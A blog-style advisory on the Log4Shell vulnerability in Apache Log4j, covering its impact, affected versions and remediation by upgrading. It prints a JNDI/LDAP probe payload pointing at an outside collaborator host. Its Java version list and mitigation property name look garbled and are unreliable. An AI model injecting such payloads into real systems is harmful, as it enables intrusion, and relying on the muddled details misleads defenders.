According to the experts, around 3 billion applications, consumer and enterprise services and websites got affected by the Log4J vulnerabilities.
What is Log4j?
Log4j is an open-source logging library developed in Java by Apache Software Foundation. It is widely used by hugely popular applications like iCloud, Steam and Minecraft, along with millions of other applications; so the probable breakout of this issue is astronomical.
On Dec 9th 21, a 0-day exploit was discovered in the popular Java logging library log4j (v2) which leads to Remote Code Execution (RCE) by logging a certain string. It has now been published as CVE-2021–44228, CVE-2021-45105, CVE-2021-45046 This vulnerability is popularly known as “Log4Shell vulnerability”
Java 6 - 6u212
Java 7 - 7u202
Java 8 - 11.0.2
If your Log4j version is older than 2.16.0 and your Java version follows suite with patch level older than the listed above, you most certainly fall under the vulnerable category. Currently, your internet-facing infrastructure may have already been compromised as hackers are actively exploiting this vulnerability.
The simple answer is “very bad”! The Log4Shell vulnerability was first spotted in Minecraft where Microsoft rolled out an emergency patch to quickly fix this issue. TechCrunch also reported that big names like Apple, Amazon, Twitter, and Cloudflare are also vulnerable to Log4Shell attacks. As per TechCrunch, “The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom’s CERT, and the Greynoise web monitoring service have all warned that attackers are actively looking for servers vulnerable to Log4Shell attacks. According to the latter, around 100 distinct hosts are scanning the internet for ways to exploit the Log4j vulnerability.”
With Log4j being a Java-based library, there is a high chance that billions of devices are vulnerable to this exploit. Big name companies and services like Cisco, Steam, VMWare, Apple iCloud, Minecraft, Tesla and others have already been found to be vulnerable.
Everybody that uses Apache framework’s services or any Spring-Boot Java-based framework applications using log4j2 is also likely to be at risk of this vulnerability.
image: Flaticon.com
image: Flaticon.com
Attackers can detect this vulnerability by simply inserting their payload as “${jndi:ldap://xyz.burpcollaborator.net/a}” in some parameters, User-Agent, Referrer, Search bar, and different input fields. If attackers are getting a DNS interaction with your collaborator then it may be vulnerable.
Adding "log4j.format.msg.nolookups=true" to the global configuration of your server or your web applications.
The straightforward way of remediation is updating the Log4j library to version 2.17.0 or later, since this behavior by default will be disabled.
Stay tuned for more information and updates on this blog.